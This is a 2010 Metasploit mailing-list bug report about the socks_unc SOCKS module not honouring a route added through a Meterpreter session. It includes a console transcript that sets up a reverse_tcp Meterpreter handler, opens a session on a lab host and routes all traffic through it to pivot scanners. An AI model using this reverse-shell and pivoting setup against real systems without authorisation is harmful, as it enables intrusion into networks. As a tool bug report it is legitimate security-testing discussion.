[framework] Bug report or Feature request socks_unc/route

From: Mark Baggett <lo127001_at_nospam>
Date: Wed Mar 17 2010 - 01:55:31 GMT
To: framework@spool.metasploit.com

I don't know if this is a bug or a product enhancement, but here it
goes....

I want to use Proxychains to route nmap, nessus and other tcp/udp
tools through a meterpreter session. After I get Meterpreter on a
host as session 1 I want to add a route and use the SOCKS_UNC server
with proxychains. Similar to these vids but instead of an SSH server
use the SOCKS_UNC auxiliary module:

http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html

But the SOCKS_UNC server doesn't use the route that is added and
packets still route locally. Here is what I did..

root@bt:/pentest/exploits/framework3# ./msfconsole

                                   _ _
              _ | | (_)_
  ____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                            |_|

=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 533 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8826 updated today (2010.03.15)

msf > color false
msf > use multi/handler
msf exploit(handler) > set LHOST 172.16.186.132
LHOST => 172.16.186.132
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC process yes Exit technique: seh, thread,
process
    LHOST 172.16.186.132 yes The local address
    LPORT 80 yes The local port

Exploit target:

    Id Name
    -- ----
    0 Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.186.132:80
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (172.16.186.132:80 ->
172.16.186.128:3782)

meterpreter >
Background session 1? [y/N] y
[-] Unknown command: y.
msf exploit(handler) > route add 0.0.0.0 0.0.0.0 1
msf exploit(handler) > back
use server/socksmsf > use server/socks_unc
msf auxiliary(socks_unc) > set SRVPORT 9050
SRVPORT => 9050
msf auxiliary(socks_unc) > set SRVHOST 172.16.186.132
SRVHOST => 172.16.186.132
msf auxiliary(socks_unc) > show options

Module options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    SRVHOST 172.16.186.132 yes The local host to listen on.
    SRVPORT 9050 yes The local port to listen on.
    SSL false no Negotiate SSL for incoming
connections
    SSLVersion SSL3 no Specify the version of SSL
that should be used (accepted: SSL2, SSL3, TLS1)
    UNCHOST no The address of the UNC host.

Thanks,
Mark Baggett

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

This message: [ Message body ]
Next message: NetEvil: "Re: [framework] Shikata_ga_nai evasion..."
Previous message: Ë³´ïÕÅ: "[framework] Error connecting to Nexpose"
Next in thread: HD Moore: "Re: [framework] Bug report or Feature request socks_unc/route"
Reply: HD Moore: "Re: [framework] Bug report or Feature request socks_unc/route"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]